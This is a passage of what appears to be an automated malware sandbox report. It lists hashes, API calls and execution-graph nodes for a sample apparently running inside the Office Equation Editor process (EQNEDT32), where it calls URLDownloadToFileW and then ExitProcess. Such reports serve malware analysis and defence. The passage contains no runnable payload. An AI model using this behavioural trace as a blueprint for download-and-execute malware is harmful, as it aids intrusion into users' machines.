                                                                            • Instruction Fuzzy Hash: 8C318D6940C3C52FC71AD7604DABBA6BF656B93314F1C8ACEE4C10E1E3E3689602C756

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.427253488.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                            Similarity
                                                                            • API ID: DownloadFile
                                                                            • String ID:
                                                                            • API String ID: 1407266417-0
                                                                            • Opcode ID: f29df95d9a18c321981f5fff7f293e617125a0b35ad74671cee5925c83681e80
                                                                            • Instruction ID: 4abb063192d63a7b7dcf567e606e535a3b6e7df8f8384d77df3a1ee6b320c50e
                                                                            • Opcode Fuzzy Hash: f29df95d9a18c321981f5fff7f293e617125a0b35ad74671cee5925c83681e80
                                                                            • Instruction Fuzzy Hash: A8115E6984C3C52BC72AD7704DABB56BF656B53604F1CCACEA1C50E0E3A3A89201C646

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            APIs
                                                                            • URLDownloadToFileW.URLMON(00000000,0360184D,?,00000000,00000000), ref: 0360189D
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.427253488.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                            Similarity
                                                                            • API ID: DownloadFile
                                                                            • String ID:
                                                                            • API String ID: 1407266417-0
                                                                            • Opcode ID: c3724f465438621bf03841c99be26e38eb38b75d7c5886b97db37e05723a6adc
                                                                            • Instruction ID: aaabe50f673c18797a4bdc8ca6f3f1b0c39b5334a7cbbeeefc2394ca0c679d41
                                                                            • Opcode Fuzzy Hash: c3724f465438621bf03841c99be26e38eb38b75d7c5886b97db37e05723a6adc
                                                                            • Instruction Fuzzy Hash: 07E0D87858830136E628F7908D87F5BB6699BC3F50F20874CF3A11E1D1B2E4A7088555

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            APIs
                                                                            • ExitProcess.KERNEL32(00000000,?,036018FA,?,036018DE), ref: 0360190B
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.427253488.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                            Similarity
                                                                            • API ID: ExitProcess
                                                                            • String ID:
                                                                            • API String ID: 621844428-0
                                                                            • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                                            • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                                            • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                                            • Instruction Fuzzy Hash:

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 115 360190d-3601918 GetPEB
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.427253488.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d66d3eda1ef59322e4862fe7bce6ac3608438173313f0ae18d6122f1e409d4e8
                                                                            • Instruction ID: 96ab6f2e8ecb871bde7af38350253df8620d4ee466ad751ab99aad78215f9523
                                                                            • Opcode Fuzzy Hash: d66d3eda1ef59322e4862fe7bce6ac3608438173313f0ae18d6122f1e409d4e8
                                                                            • Instruction Fuzzy Hash: A9A001752529858BD252CB09C990B02F37AFBC8A55F28C754C40947B1A9238E9568994

                                                                            Execution Graph

                                                                            Execution Coverage:3.4%
                                                                            Dynamic/Decrypted Code Coverage:1.1%
                                                                            Signature Coverage:3.1%
                                                                            Total number of Nodes:1663
                                                                            Total number of Limit Nodes:60
81142->81144 81148 413aab ___sbh_find_block 81143->81148 81156 417f23 69 API calls __getptd_noexit 81144->81156 81146 413aff GetLastError 81146->81140 81147 413ac5 81155 413ade LeaveCriticalSection _doexit 81147->81155 81148->81147 81154 419f9d __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 81148->81154 81151->81140 81151->81142 81152->81121 81153->81110 81154->81147 81155->81151 81156->81146 81158 416a01 81157->81158 81159 416a22 GetModuleHandleW 81157->81159 81158->81159 81160 416a0b TlsGetValue 81158->81160 81161 416a32 81159->81161 81162 416a3d GetProcAddress 81159->81162 81166 416a16 81160->81166 81184 41177f Sleep GetModuleHandleW 81161->81184 81168 416a1a 81162->81168 81164 41130e 81164->81072 81165 416a4d RtlDecodePointer 81165->81164 81166->81159 81166->81168 81167 416a38 81167->81162 81167->81164 81168->81164 81168->81165 81169->81075 81170->81083 81171->81086 81173 4169a7 GetModuleHandleW 81172->81173 81174 416986 81172->81174 81175 4169c2 GetProcAddress 81173->81175 81176 4169b7 81173->81176 81174->81173 81177 416990 TlsGetValue 81174->81177 81183 41699f 81175->81183 81185 41177f Sleep GetModuleHandleW 81176->81185 81179 41699b 81177->81179 81179->81173 81179->81183 81180 4169bd 81180->81175 81182 4169da 81180->81182 81181 4169d2 RtlEncodePointer 81181->81182 81182->81088 81183->81181 81183->81182 81184->81167 81185->81180 81189 41832d LeaveCriticalSection 81186->81189 81188 411420 81188->81065 81189->81188 81190 40b380 81191 40b3a5 81190->81191 81192 40b53d 81190->81192 81193 430a99 81191->81193 81199 40b3b6 81191->81199 81214 45e62e 118 API calls 3 library calls 81192->81214 81215 45e62e 118 API calls 3 library calls 81193->81215 81196 430aae 81201 4092c0 VariantClear 81196->81201 81197 40b528 81199->81196 81202 40b3f2 81199->81202 81210 40b4fd ctype 81199->81210 81200 430dc9 81200->81200 81201->81197 81203 40b429 81202->81203 81204 430ae9 VariantClear 81202->81204 81212 40b476 ctype 81202->81212 81213 40b43b ctype 81203->81213 81216 
40e380 VariantClear ctype 81203->81216 81204->81213 81205 430d41 VariantClear 81205->81210 81206 40b4eb 81206->81210 81217 40e380 VariantClear ctype 81206->81217 81208 41171a 77 API calls 81208->81212 81210->81197 81218 45e62e 118 API calls 3 library calls 81210->81218 81211 430d08 ctype 81211->81205 81211->81210 81212->81206 81212->81211 81213->81208 81213->81212 81214->81193 81215->81196 81216->81213 81217->81210 81218->81200 81219 4169e0 81220 41696e __encode_pointer 7 API calls 81219->81220 81221 4169e7 81220->81221 81222 444343 81225 444326 81222->81225 81224 44434e WriteFile 81226 444340 81225->81226 81227 4442c7 81225->81227 81226->81224 81232 40e190 SetFilePointerEx 81227->81232 81229 4442e0 SetFilePointerEx 81233 40e190 SetFilePointerEx 81229->81233 81231 4442ff 81231->81224 81232->81229 81233->81231 81234 46d22f 81237 46d098 81234->81237 81236 46d241 81238 46d0b5 81237->81238 81239 46d115 81238->81239 81240 46d0b9 81238->81240 81288 45c216 80 API calls 81239->81288 81241 41171a 77 API calls 81240->81241 81243 46d0c0 81241->81243 81245 46d0cc 81243->81245 81281 40d940 78 API calls 81243->81281 81244 46d126 81246 46d0f8 81244->81246 81252 46d142 81244->81252 81282 453063 81245->81282 81247 4092c0 VariantClear 81246->81247 81249 46d0fd 81247->81249 81249->81236 81253 46d1c8 81252->81253 81256 46d158 81252->81256 81301 4676a3 80 API calls 81253->81301 81259 453063 113 API calls 81256->81259 81257 46d0ea 81257->81252 81260 46d0ee 81257->81260 81258 46d1ce 81302 4444c2 SetFilePointerEx SetFilePointerEx WriteFile 81258->81302 81268 46d15e 81259->81268 81260->81246 81287 44ade5 CloseHandle ctype 81260->81287 81261 46d18d 81289 467fce 84 API calls 81261->81289 81265 46d196 81290 4013a0 81265->81290 81266 46d1e7 81270 4092c0 VariantClear 81266->81270 81280 46d194 81266->81280 81268->81261 81268->81265 81270->81280 81274 46d224 81274->81236 81275 40d900 CloseHandle 81277 46d216 81275->81277 81276 46d1b8 81300 467fce 84 API calls 81276->81300 81303 44ade5 CloseHandle 
ctype 81277->81303 81280->81274 81280->81275 81281->81245 81283 45306e 81282->81283 81284 45307a 81282->81284 81283->81284 81304 452e2a 113 API calls 5 library calls 81283->81304 81286 40dfa0 85 API calls 81284->81286 81286->81257 81287->81246 81288->81244 81289->81280 81291 41171a 77 API calls 81290->81291 81292 4013c4 81291->81292 81305 401380 81292->81305 81295 40df50 81296 40df61 81295->81296 81297 40df56 81295->81297 81299 40d3b0 77 API calls 2 library calls 81296->81299 81308 404080 77 API calls _memcpy_s 81297->81308 81299->81276 81300->81280 81301->81258 81302->81266 81303->81274 81304->81284 81306 41171a 77 API calls 81305->81306 81307 401387 81306->81307 81307->81295 81308->81296 81309 3a45528 81323 3a43178 81309->81323 81311 3a455fe 81326 3a45418 81311->81326 81313 3a45627 CreateFileW 81315 3a45676 81313->81315 81316 3a4567b 81313->81316 81316->81315 81317 3a45692 VirtualAlloc 81316->81317 81317->81315 81318 3a456b0 ReadFile 81317->81318 81318->81315 81319 3a456cb 81318->81319 81320 3a44418 12 API calls 81319->81320 81321 3a456fe 81320->81321 81322 3a45721 ExitProcess 81321->81322 81322->81315 81329 3a46628 GetPEB 81323->81329 81325 3a43803 81325->81311 81327 3a45421 Sleep 81326->81327 81328 3a4542f 81327->81328 81330 3a46652 81329->81330 81330->81325 81331 40116e 81332 401119 DefWindowProcW 81331->81332 81333 429212 81338 410b90 81333->81338 81336 411421 __cinit 76 API calls 81337 42922f 81336->81337 81339 410b9a __write_nolock 81338->81339 81340 41171a 77 API calls 81339->81340 81341 410c31 GetModuleFileNameW 81340->81341 81355 413db0 81341->81355 81343 410c66 _wcsncat 81358 413e3c 81343->81358 81346 41171a 77 API calls 81347 410ca3 _wcscpy 81346->81347 81348 410cd1 RegOpenKeyExW 81347->81348 81349 429bc3 RegQueryValueExW 81348->81349 81350 410cf7 81348->81350 81351 429cd9 RegCloseKey 81349->81351 81353 429bf2 _wcscat _wcslen _wcsncpy 81349->81353 81350->81336 81352 41171a 77 API calls 81352->81353 81353->81352 81354 429cd8 81353->81354 81354->81351 
81361 413b95 81355->81361 81391 41abec 81358->81391 81362 413c2f 81361->81362 81368 413bae 81361->81368 81363 413d60 81362->81363 81364 413d7b 81362->81364 81387 417f23 69 API calls __getptd_noexit 81363->81387 81389 417f23 69 API calls __getptd_noexit 81364->81389 81367 413d65 81372 413cfb 81367->81372 81388 417ebb 7 API calls 2 library calls 81367->81388 81368->81362 81377 413c1d 81368->81377 81383 41ab19 69 API calls __vswprintf_l 81368->81383 81371 413d03 81371->81362 81371->81372 81374 413d8e 81371->81374 81372->81343 81373 413cb9 81373->81362 81375 413cd6 81373->81375 81385 41ab19 69 API calls __vswprintf_l 81373->81385 81390 41ab19 69 API calls __vswprintf_l 81374->81390 81375->81362 81375->81372 81379 413cef 81375->81379 81377->81362 81382 413c9b 81377->81382 81384 41ab19 69 API calls __vswprintf_l 81377->81384 81386 41ab19 69 API calls __vswprintf_l 81379->81386 81382->81371 81382->81373 81383->81377 81384->81382 81385->81375 81386->81372 81387->81367 81389->81367 81390->81372 81392 41ac02 81391->81392 81393 41abfd 81391->81393 81400 417f23 69 API calls __getptd_noexit 81392->81400 81393->81392 81394 41ac22 81393->81394 81399 410c99 81394->81399 81402 417f23 69 API calls __getptd_noexit 81394->81402 81396 41ac07 81401 417ebb 7 API calls 2 library calls 81396->81401 81399->81346 81400->81396 81402->81396 81403 409030 81417 409110 119 API calls 81403->81417 81405 42ceb6 81427 410ae0 VariantClear ctype 81405->81427 81407 40906e 81407->81405 81409 42cea9 81407->81409 81411 4090a4 81407->81411 81408 42cebf 81426 45e62e 118 API calls 3 library calls 81409->81426 81418 404160 81411->81418 81414 4090f0 ctype 81415 4092c0 VariantClear 81416 4090be ctype 81415->81416 81416->81414 81416->81415 81417->81407 81419 4092c0 VariantClear 81418->81419 81420 40416e 81419->81420 81428 404120 81420->81428 81422 40419b 81432 4734b7 81422->81432 81476 40efe0 81422->81476 81423 4041c6 81423->81405 81423->81416 81426->81405 81427->81408 81429 40412e 81428->81429 81430 4092c0 
VariantClear 81429->81430 81431 404138 81430->81431 81431->81422 81433 453063 113 API calls 81432->81433 81434 4734d7 81433->81434 81435 473545 81434->81435 81436 47350c 81434->81436 81484 463c42 81435->81484 81437 4092c0 VariantClear 81436->81437 81443 473514 81437->81443 81439 473558 81440 47355c 81439->81440 81457 473595 81439->81457 81442 4092c0 VariantClear 81440->81442 81441 473616 81497 463d7e 81441->81497 81450 473564 81442->81450 81443->81423 81445 453063 113 API calls 81445->81457 81446 473622 81447 473697 81446->81447 81448 47362c 81446->81448 81531 457838 81447->81531 81449 4092c0 VariantClear 81448->81449 81454 473634 81449->81454 81450->81423 81454->81423 81456 473655 81459 4092c0 VariantClear 81456->81459 81457->81441 81457->81445 81457->81456 81543 462f5a 89 API calls __wcsicoll 81457->81543 81471 47365d 81459->81471 81460 4736b0 81544 45e62e 118 API calls 3 library calls 81460->81544 81461 4736c9 81545 40e7e0 78 API calls 81461->81545 81464 4736ba GetCurrentProcess TerminateProcess 81464->81461 81465 4736db 81472 4736ff 81465->81472 81546 40d030 78 API calls 81465->81546 81467 473731 81473 473744 FreeLibrary 81467->81473 81474 47374b 81467->81474 81468 4736f1 81547 46b945 136 API calls 2 library calls 81468->81547 81471->81423 81472->81467 81548 40d030 78 API calls 81472->81548 81549 46b945 136 API calls 2 library calls 81472->81549 81473->81474 81474->81423 81477 40eff5 CreateFileW 81476->81477 81478 4299bf 81476->81478 81479 40f017 81477->81479 81478->81479 81480 4299c4 CreateFileW 81478->81480 81479->81423 81480->81479 81481 4299ea 81480->81481 81588 40e0d0 SetFilePointerEx SetFilePointerEx 81481->81588 81483 4299f5 81483->81479 81550 45335b 78 API calls 81484->81550 81486 463c5d 81551 442c52 82 API calls _wcslen 81486->81551 81488 463c72 81490 40c060 77 API calls 81488->81490 81496 463cac 81488->81496 81491 463c8e 81490->81491 81552 4608ce 77 API calls _memcpy_s 81491->81552 81493 463ca4 81553 40c740 81493->81553 81495 463cf7 81495->81439 
81496->81495 81558 462f5a 89 API calls __wcsicoll 81496->81558 81498 453063 113 API calls 81497->81498 81499 463d99 81498->81499 81500 463de0 81499->81500 81501 463dca 81499->81501 81567 40c760 80 API calls 81500->81567 81566 453081 113 API calls 81501->81566 81504 463dd0 LoadLibraryW 81506 463e09 81504->81506 81505 463de7 81518 463e19 81505->81518 81568 40c760 80 API calls 81505->81568 81508 463e3e 81506->81508 81506->81518 81510 463e4e 81508->81510 81511 463e7b 81508->81511 81509 463dfb 81509->81518 81569 40c760 80 API calls 81509->81569 81570 40d500 81510->81570 81576 40c760 80 API calls 81511->81576 81516 463e82 GetProcAddress 81520 463e90 81516->81520 81518->81446 81519 463e62 GetProcAddress 81522 463e79 81519->81522 81520->81518 81521 463edf 81520->81521 81520->81522 81521->81518 81525 463eef FreeLibrary 81521->81525 81522->81520 81577 403470 77 API calls _memcpy_s 81522->81577 81524 463eb4 81526 40d500 77 API calls 81524->81526 81525->81518 81527 463ebd 81526->81527 81578 45efe7 79 API calls ctype 81527->81578 81529 463ec8 GetProcAddress 81579 401330 ctype 81529->81579 81532 457a4c 81531->81532 81533 45785f _strcat _wcslen _wcscpy ctype 81531->81533 81539 410d40 81532->81539 81533->81532 81534 443576 80 API calls 81533->81534 81535 40c760 80 API calls 81533->81535 81536 453081 113 API calls 81533->81536 81537 4138ba 69 API calls _malloc 81533->81537 81580 40f580 81533->81580 81534->81533 81535->81533 81536->81533 81537->81533 81541 410d55 81539->81541 81540 410ded VirtualProtect 81542 410dbb 81540->81542 81541->81540 81541->81542 81542->81460 81542->81461 81543->81457 81544->81464 81545->81465 81546->81468 81547->81472 81548->81472 81549->81472 81550->81486 81551->81488 81552->81493 81554 40c752 81553->81554 81555 40c747 81553->81555 81554->81496 81555->81554 81559 402ae0 81555->81559 81557 42a572 _memcpy_s 81557->81496 81558->81495 81560 42a06a 81559->81560 81561 402aef 81559->81561 81562 401380 77 API calls 81560->81562 81561->81557 81563 42a072 
81562->81563 81564 41171a 77 API calls 81563->81564 81565 42a095 _memcpy_s 81564->81565 81565->81557 81566->81504 81567->81505 81568->81509 81569->81506 81571 41171a 77 API calls 81570->81571 81572 40d515 81571->81572 81573 41171a 77 API calls 81572->81573 81574 40d521 81573->81574 81575 45efe7 79 API calls ctype 81574->81575 81575->81519 81576->81516 81577->81524 81578->81529 81579->81521 81581 429440 81580->81581 81582 40f589 _wcslen 81580->81582 81583 40f58f WideCharToMultiByte 81582->81583 81584 40f5d8 81583->81584 81585 40f5ad 81583->81585 81584->81533 81586 41171a 77 API calls 81585->81586 81587 40f5bb WideCharToMultiByte 81586->81587 81587->81533 81588->81483 81589 4034b0 81590 4034b9 81589->81590 81591 4034bd 81589->81591 81592 42a0ba 81591->81592 81593 41171a 77 API calls 81591->81593 81594 4034fe _memcpy_s ctype 81593->81594 81595 416193 81632 41718c 81595->81632 81597 41619f GetStartupInfoW 81599 4161c2 81597->81599 81633 41aa31 HeapCreate 81599->81633 81601 416212 81635 416e29 GetModuleHandleW 81601->81635 81605 416223 __RTC_Initialize 81669 41b669 81605->81669 81608 416231 81609 41623d GetCommandLineW 81608->81609 81738 4117af 69 API calls 3 library calls 81608->81738 81684 42235f GetEnvironmentStringsW 81609->81684 81612 41624c 81690 4222b1 GetModuleFileNameW 81612->81690 81613 41623c 81613->81609 81615 416256 81616 416261 81615->81616 81739 4117af 69 API calls 3 library calls 81615->81739 81694 422082 81616->81694 81620 416272 81707 41186e 81620->81707 81623 416279 81625 416284 __wwincmdln 81623->81625 81741 4117af 69 API calls 3 library calls 81623->81741 81713 40d7f0 81625->81713 81628 4162b3 81743 411a4b 69 API calls _doexit 81628->81743 81631 4162b8 _fseek 81632->81597 81634 416206 81633->81634 81634->81601 81736 41616a 69 API calls 3 library calls 81634->81736 81636 416e44 81635->81636 81637 416e3d 81635->81637 81639 416fac 81636->81639 81640 416e4e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 81636->81640 81744 41177f Sleep 
GetModuleHandleW 81637->81744 81754 416ad5 72 API calls 2 library calls 81639->81754 81642 416e97 TlsAlloc 81640->81642 81641 416e43 81641->81636 81645 416218 81642->81645 81646 416ee5 TlsSetValue 81642->81646 81645->81605 81737 41616a 69 API calls 3 library calls 81645->81737 81646->81645 81647 416ef6 81646->81647 81745 411a69 7 API calls 4 library calls 81647->81745 81649 416efb 81650 41696e __encode_pointer 7 API calls 81649->81650 81651 416f06 81650->81651 81652 41696e __encode_pointer 7 API calls 81651->81652 81653 416f16 81652->81653 81654 41696e __encode_pointer 7 API calls 81653->81654 81655 416f26 81654->81655 81656 41696e __encode_pointer 7 API calls 81655->81656 81657 416f36 81656->81657 81746 41828b InitializeCriticalSectionAndSpinCount __mtinitlocknum 81657->81746 81659 416f43 81659->81639 81660 4169e9 __decode_pointer 7 API calls 81659->81660 81661 416f57 81660->81661 81661->81639 81747 416ffb 81661->81747 81664 4169e9 __decode_pointer 7 API calls 81665 416f8a 81664->81665 81665->81639 81666 416f91 81665->81666 81753 416b12 69 API calls 5 library calls 81666->81753 81668 416f99 GetCurrentThreadId 81668->81645 81773 41718c 81669->81773 81671 41b675 GetStartupInfoA 81672 416ffb __calloc_crt 69 API calls 81671->81672 81678 41b696 81672->81678 81673 41b8b4 _fseek 81673->81608 81674 41b831 GetStdHandle 81683 41b7fb 81674->81683 81675 41b896 SetHandleCount 81675->81673 81676 416ffb __calloc_crt 69 API calls 81676->81678 81677 41b843 GetFileType 81677->81683 81678->81673 81678->81676 81679 41b77e 81678->81679 81678->81683 81679->81673 81680 41b7a7 GetFileType 81679->81680 81679->81683 81774 4189e6 InitializeCriticalSectionAndSpinCount _fseek 81679->81774 81680->81679 81683->81673 81683->81674 81683->81675 81683->81677 81775 4189e6 InitializeCriticalSectionAndSpinCount _fseek 81683->81775 81685 422370 81684->81685 81686 422374 81684->81686 81685->81612 81687 416fb6 __malloc_crt 69 API calls 81686->81687 81688 422395 _memcpy_s 81687->81688 81689 42239c 
FreeEnvironmentStringsW 81688->81689 81689->81612 81691 4222e6 _wparse_cmdline 81690->81691 81692 416fb6 __malloc_crt 69 API calls 81691->81692 81693 422329 _wparse_cmdline 81691->81693 81692->81693 81693->81615 81695 42209a _wcslen 81694->81695 81699 416267 81694->81699 81696 416ffb __calloc_crt 69 API calls 81695->81696 81702 4220be _wcslen 81696->81702 81697 422123 81698 413a88 __mtterm 69 API calls 81697->81698 81698->81699 81699->81620 81740 4117af 69 API calls 3 library calls 81699->81740 81700 416ffb __calloc_crt 69 API calls 81700->81702 81701 422149 81703 413a88 __mtterm 69 API calls 81701->81703 81702->81697 81702->81699 81702->81700 81702->81701 81705 422108 81702->81705 81776 426349 69 API calls __vswprintf_l 81702->81776 81703->81699 81705->81702 81777 417d93 10 API calls 3 library calls 81705->81777 81708 41187c __IsNonwritableInCurrentImage 81707->81708 81778 418486 81708->81778 81710 41189a __initterm_e 81711 411421 __cinit 76 API calls 81710->81711 81712 4118b9 __IsNonwritableInCurrentImage __initterm 81710->81712 81711->81712 81712->81623 81714 431bcb 81713->81714 81715 40d80c 81713->81715 81716 4092c0 VariantClear 81715->81716 81717 40d847 81716->81717 81782 40eb50 81717->81782 81720 40d877 81788 411ac6 81720->81788 81725 40d891 81798 40f370 KiUserCallbackDispatcher SystemParametersInfoW 81725->81798 81727 40d89f 81799 40d6d0 GetCurrentDirectoryW 81727->81799 81729 40d8a7 SystemParametersInfoW 81730 40d8d4 81729->81730 81731 40d8cd FreeLibrary 81729->81731 81732 4092c0 VariantClear 81730->81732 81731->81730 81733 40d8dd 81732->81733 81734 4092c0 VariantClear 81733->81734 81735 40d8e6 81734->81735 81735->81628 81742 411a1f 69 API calls _doexit 81735->81742 81736->81601 81737->81605 81738->81613 81739->81616 81740->81620 81741->81625 81742->81628 81743->81631 81744->81641 81745->81649 81746->81659 81750 417004 81747->81750 81749 416f70 81749->81639 81749->81664 81750->81749 81751 417022 Sleep 81750->81751 81755 422452 81750->81755 81752 417037 
81751->81752 81752->81749 81752->81750 81753->81668 81754->81645 81756 42245e _fseek 81755->81756 81757 422476 81756->81757 81766 422495 _memset 81756->81766 81768 417f23 69 API calls __getptd_noexit 81757->81768 81759 42247b 81769 417ebb 7 API calls 2 library calls 81759->81769 81761 422507 RtlAllocateHeap 81761->81766 81762 42248b _fseek 81762->81750 81764 418407 __lock 68 API calls 81764->81766 81766->81761 81766->81762 81766->81764 81770 41a74c 5 API calls 2 library calls 81766->81770 81771 42254e LeaveCriticalSection _doexit 81766->81771 81772 411afc 7 API calls __decode_pointer 81766->81772 81768->81759 81770->81766 81771->81766 81772->81766 81773->81671 81774->81679 81775->81683 81776->81702 81777->81705 81780 41848c 81778->81780 81779 41696e __encode_pointer 7 API calls 81779->81780 81780->81779 81781 4184a4 81780->81781 81781->81710 81836 40eb70 81782->81836 81785 40eba0 81786 40eb50 2 API calls 81785->81786 81787 40eba5 81786->81787 81787->81720 81789 418407 __lock 69 API calls 81788->81789 81790 411ad3 81789->81790 81791 4169e9 __decode_pointer 7 API calls 81790->81791 81792 411ade 81791->81792 81793 41696e __encode_pointer 7 API calls 81792->81793 81794 411ae8 81793->81794 81840 41832d LeaveCriticalSection 81794->81840 81796 40d888 81797 411b24 69 API calls __vswprintf_l 81796->81797 81797->81725 81798->81727 81841 401f80 81799->81841 81801 40d6f1 IsDebuggerPresent 81802 431a9d MessageBoxA 81801->81802 81803 40d6ff 81801->81803 81804 431ab6 81802->81804 81803->81804 81805 40d71f 81803->81805 81943 403e90 77 API calls 3 library calls 81804->81943 81911 40f3b0 81805->81911 81808 40d77a 81812 40d782 81808->81812 81814 431b09 SetCurrentDirectoryW 81808->81814 81810 40d73a GetFullPathNameW 81941 401440 129 API calls _wcscat 81810->81941 81813 40d78b 81812->81813 81944 43604b 6 API calls 81812->81944 81923 4101f0 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 81813->81923 81814->81812 81817 431b28 81817->81813 81819 431b30 GetModuleFileNameW 
81817->81819 81821 431ba4 GetForegroundWindow ShellExecuteW 81819->81821 81822 431b4c 81819->81822 81825 40d7c7 81821->81825 81945 401b70 81822->81945 81823 40d795 81831 40d7a8 81823->81831 81931 40e1e0 81823->81931 81828 40d7d1 SetCurrentDirectoryW 81825->81828 81828->81729 81830 431b66 81952 40d3b0 77 API calls 2 library calls 81830->81952 81831->81825 81942 401000 Shell_NotifyIconW _memset 81831->81942 81834 431b72 GetForegroundWindow ShellExecuteW 81835 431b9f 81834->81835 81835->81825 81837 40d86e 81836->81837 81838 40eb76 LoadLibraryA 81836->81838 81837->81720 81837->81785 81838->81837 81839 40eb87 GetProcAddress 81838->81839 81839->81837 81840->81796 81953 40e680 81841->81953 81845 401fa2 GetModuleFileNameW 81971 40ff90 81845->81971 81847 401fbd 81983 4107b0 81847->81983 81850 401b70 77 API calls 81851 401fe4 81850->81851 81986 4019e0 81851->81986 81853 401ff2 81854 4092c0 VariantClear 81853->81854 81855 402002 81854->81855 81856 401b70 77 API calls 81855->81856 81857 40201c 81856->81857 81858 4019e0 78 API calls 81857->81858 81859 40202c 81858->81859 81860 401b70 77 API calls 81859->81860 81861 40203c 81860->81861 81994 40c3e0 81861->81994 81863 40204d 81864 40c060 77 API calls 81863->81864 81865 402061 81864->81865 82012 401a70 81865->82012 81867 40206e 82019 4115d0 81867->82019 81870 42c174 81872 401a70 77 API calls 81870->81872 81871 402088 81873 4115d0 __wcsicoll 81 API calls 81871->81873 81874 42c189 81872->81874 81875 402093 81873->81875 81877 401a70 77 API calls 81874->81877 81875->81874 81876 40209e 81875->81876 81878 4115d0 __wcsicoll 81 API calls 81876->81878 81879 42c1a7 81877->81879 81880 4020a9 81878->81880 81881 42c1b0 GetModuleFileNameW 81879->81881 81880->81881 81882 4020b4 81880->81882 81884 401a70 77 API calls 81881->81884 81883 4115d0 __wcsicoll 81 API calls 81882->81883 81885 4020bf 81883->81885 81886 42c1e2 81884->81886 81887 402107 81885->81887 81892 401a70 77 API calls 81885->81892 81894 42c20a _wcscpy 81885->81894 81888 40df50 77 API 
calls 81886->81888 81889 402119 81887->81889 81887->81894 81890 42c1f1 81888->81890 81891 42c243 81889->81891 82027 40e7e0 78 API calls 81889->82027 81893 401a70 77 API calls 81890->81893 81896 4020e5 _wcscpy 81892->81896 81897 42c201 81893->81897 81898 401a70 77 API calls 81894->81898 81902 401a70 77 API calls 81896->81902 81897->81894 81909 402148 81898->81909 81899 402132 82028 40d030 78 API calls 81899->82028 81901 40213e 81903 4092c0 VariantClear 81901->81903 81902->81887 81903->81909 81904 402184 81907 4092c0 VariantClear 81904->81907 81910 402196 ctype 81907->81910 81908 401a70 77 API calls 81908->81909 81909->81904 81909->81908 82029 40d030 78 API calls 81909->82029 82030 40e640 78 API calls 81909->82030 81910->81801 81912 42ccf4 _memset 81911->81912 81913 40f3c9 81911->81913 81916 42cd05 GetOpenFileNameW 81912->81916 82710 40ffb0 78 API calls ctype 81913->82710 81915 40f3d2 82711 410130 SHGetMalloc 81915->82711 81916->81913 81918 40d732 81916->81918 81918->81808 81918->81810 81919 40f3d9 82716 410020 90 API calls __wcsicoll 81919->82716 81921 40f3e7 82717 40f400 81921->82717 81924 42b9d3 81923->81924 81925 41025a LoadImageW RegisterClassExW 81923->81925 82757 443e8f EnumResourceNamesW LoadImageW 81924->82757 82756 4102f0 7 API calls 81925->82756 81928 42b9da 81929 40d790 81930 4103e0 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 81929->81930 81930->81823 81933 40e207 _memset 81931->81933 81932 40e262 81940 40e2a4 81932->81940 82780 43737d 86 API calls __wcsicoll 81932->82780 81933->81932 81934 42aa14 DestroyIcon 81933->81934 81934->81932 81936 40e2c0 Shell_NotifyIconW 82758 401be0 81936->82758 81937 42aa50 Shell_NotifyIconW 81939 40e2da 81939->81831 81940->81936 81940->81937 81941->81808 81942->81825 81943->81808 81944->81817 81946 401b76 _wcslen 81945->81946 81947 41171a 77 API calls 81946->81947 81950 401bc5 81946->81950 81948 401bad _memcpy_s 81947->81948 81949 41171a 77 API calls 81948->81949 81949->81950 81951 40d3b0 77 API calls 2 library 
calls 81950->81951 81951->81830 81952->81834 81954 40c060 77 API calls 81953->81954 81955 401f90 81954->81955 81956 402940 81955->81956 81957 40294a __write_nolock 81956->81957 82031 4021e0 81957->82031 81960 402972 81964 4029a4 81960->81964 82043 401cf0 81960->82043 81961 402ae0 77 API calls 81961->81964 81962 402abe 81962->81845 81963 402a8c 81963->81962 81965 401b70 77 API calls 81963->81965 81964->81961 81964->81963 81966 401b70 77 API calls 81964->81966 81970 401cf0 77 API calls 81964->81970 82046 40d970 77 API calls 2 library calls 81964->82046 81967 402ab3 81965->81967 81966->81964 82047 40d970 77 API calls 2 library calls 81967->82047 81970->81964 82049 40f5e0 81971->82049 81974 40ffa6 81974->81847 81976 42b6d8 81977 42b6e6 81976->81977 82105 434fe1 81976->82105 81978 413a88 __mtterm 69 API calls 81977->81978 81980 42b6f5 81978->81980 81981 434fe1 108 API calls 81980->81981 81982 42b702 81981->81982 81982->81847 81984 41171a 77 API calls 81983->81984 81985 401fd6 81984->81985 81985->81850 81987 401a03 81986->81987 81992 4019e5 81986->81992 81988 401a1a 81987->81988 81987->81992 82701 404260 78 API calls 81988->82701 81990 4019ff 81990->81853 81991 401a26 